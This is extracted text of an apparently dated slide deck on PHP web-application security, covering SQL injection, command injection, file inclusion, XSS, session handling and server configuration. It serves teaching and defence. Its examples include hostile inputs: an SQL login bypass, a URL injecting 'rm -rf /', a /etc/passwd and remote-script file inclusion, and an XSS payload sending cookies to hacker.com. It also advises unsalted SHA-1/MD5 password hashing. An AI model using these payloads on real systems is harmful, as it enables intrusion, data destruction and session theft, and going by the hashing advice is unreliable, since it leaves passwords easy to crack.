Web-applications

and Security

Bård Farstad <bf@ez.no>

CTO @ eZ Systems

Questions?

?

eZ Systems

Founded 1999 in Norway

Base philosophy: Open, Share and Innovate!

Privately Owned

85 employees

HQ in Skien, Norway. 8 subsidiaries:

Oslo, Copenhagen, Dortmund, Lyon, Paris, Brussels, Chicago, Vancouver

Customers and VerticalsCustomers and Verticals

Media and Entertainment

Security

United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense (including any divisions of the US armed forces) to store both classified and unclassified information.

Apache is Big!

• ApacheisBigwith70%marketshare

PHP is Big!

• Morethan20MilliondomainsrunningPHP• Manydevelopers,manyprojects• Skills?

Firewalls

• Webtrafficusesport80• Normallynotaffectedbyfirewalls

• SSL• Datatransferprotectedby128/256encryption• Doesnothelpapplicationsecurity

Web Application Firewall

• Intrusiondetectionandpreventionengine• ModSecurityforApache(OpenSource)• IncreasesWebSecurity

• ProtectsWebApplicationagainstknownandunknownattacks• AnalyzingHTTPtraffic

• POSTtraffic• GETtraffic

Typical example

SQL Injection

• Databaselevelvulnerabilityduetoincorrectescaping

• Simpleexample:• LoginSQL:select * from user where login='$login' and

password='$password'• Accessscriptwithlogin.php?login=admin'--&password=fooWithout proper escaping $login = admin'--

• Willauthenticateasadminuserwithoutsupplyingpassword

Preventing SQL injection

• Inputvalidation• Verifythatdatainputisincorrectformat• Typecasting(int)

• SQLescaping• Usefunctionslikepg_escape,mysql_escape_string()andmysql_real_escape_string()toescapequotesetc

Code Injection

• UsingsystemcommandsfromPHP• eval(),exec()andsystem()

• Commandlineconversionofimagessystem( “convert image.jpg thumb.jpg {$width}x{$height}” );

• Scriptaccessedfromconvert.php?width=500&height=300;%20rm%20-rf/

• Thiswillconvertimageandrun“rm-rf/”onthesystem• Useexistingfunctionstoescape

• escapeshellcmd(),escapeshellarg(),realpath(),addslashes()

Dynamic Applications

• Neverincludepagedirectlyfromuserinputif(isset($page)) { include($page); }

• Withoutvalidationattackerscanscript.php?page=/etc/passwdscript.php?page=http://cracker.com/badscript.php

• Abitmoresecure?include( “directory” . $page . “.php” );Not really:script.php?page=../../../etc/passwd%00

GET vs POST

• GETvariablesarelogged• AvailableinHTTPReferrer

• Hijacksession,passwords,personalinfoetc• POSTvariablesisnotavailableinlogfile

• POSTvariablesshouldbeusedforforms

XSS – Cross Site Scripting

• Displayofunwasheduserinput• Forums• Comments

• Vulnerabletosessionhijacks• Attackerscanstealcookies• Commonlynottakenseriously

Example: http://www.owned.com"&lt;script&gt;cookie=document.cookie;window.location='http://hacker.com/steal.php?cookie='+cookie+'';&lt;/script&gt;

<script>

cookie=document.cookie;

window.location='http://hacker.com/steal.php?cookie='+cookie+'';

</script>

Input Validation

• Firststepofeveryscriptwhichhandlesinput• Checkif

• Integersareactuallyintegers• e-mailaddressesarecorrect• Namesonlycontainsvalidcharactersfromthecharsets

• Reportgeneralerrorstotheuser• Neverdisplayservererrorstouser

Sub-system Meta-character Washing

• Escapedatapassedtosubsystems• SQLdatabase• Filesystem

• WashingisdifferentfromValidation

Output Washing

• MakesurethatalldataisconvertedtoXHTML• Datacancomefrom

• Userinput• Database• File

• Don'tstoreXHTMLinthedatabase• Convertcontentjustbeforeit'sdisplayed

• Usefunctionslike:htmlspecialchars()

Clear Text Passwords

• Neverstorepasswords• Visibletositeadministrators• Databaseiscrackedandexposed

• Useaonewayhashingalgorithm• SHA-1• MD5

• Example$password = 'secret';If ( sha1( $password ) == 'a375332c48af107c37a0cc53e5a5fb1d535b7950' ){

print( “Password accepted” );}

Error handling

• Alwaysdisableerroroutput• php.ini:• log_errors=On• display_errors=Off

• Errormessagescanbeusedbyattacker

Sessions

• DisabletransparentSIDsupport• php.ini• session.use_trans_sid=0http://example.com/?PHPSSID=cc51dc49792031b9f1f7e2ead5ed6441

• ApachelogsHTTPreferer• Sessionscaneasilybehijacked

Database Sessions

• DonotusethedefaultfilebasedPHPsessionhandlers• Storedin/tmpbydefault• Accessibletoanyuseronthesystem

Server and application configuration

• PHPsourcecodedisplay• AddTypeapplication/x-httpd-php-source.phps

• Transsid->off• Disableglobalvariables

Summary

• FirewallsandSSLcannothelp• Canuseapplicationlevelfirewall(mod_security)• Alwaysvalidateinput• Alwayswashoutput• Configuretheserverandapplicationproperly

Questions?